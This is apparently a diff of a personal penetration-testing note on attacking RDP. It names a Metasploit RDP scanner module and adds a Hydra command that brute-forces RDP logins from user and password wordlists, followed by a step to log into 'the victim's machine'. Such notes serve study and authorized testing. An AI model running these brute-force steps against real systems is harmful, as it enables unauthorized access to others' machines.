Asifkhan127001/Penetration-test/Networking/RDP.md

        use auxiliary/scanner/rdp/rdp_scanner

-4. use Hydra to brute force the login credentials
+3. use Hydra to brute force the login credentials

+       hydra -L user.txt -P password.txt rdp://IP -s PORT

-5. use and RDP tools to login into the victim's machine
+4. use and RDP tools to login into the victim's machine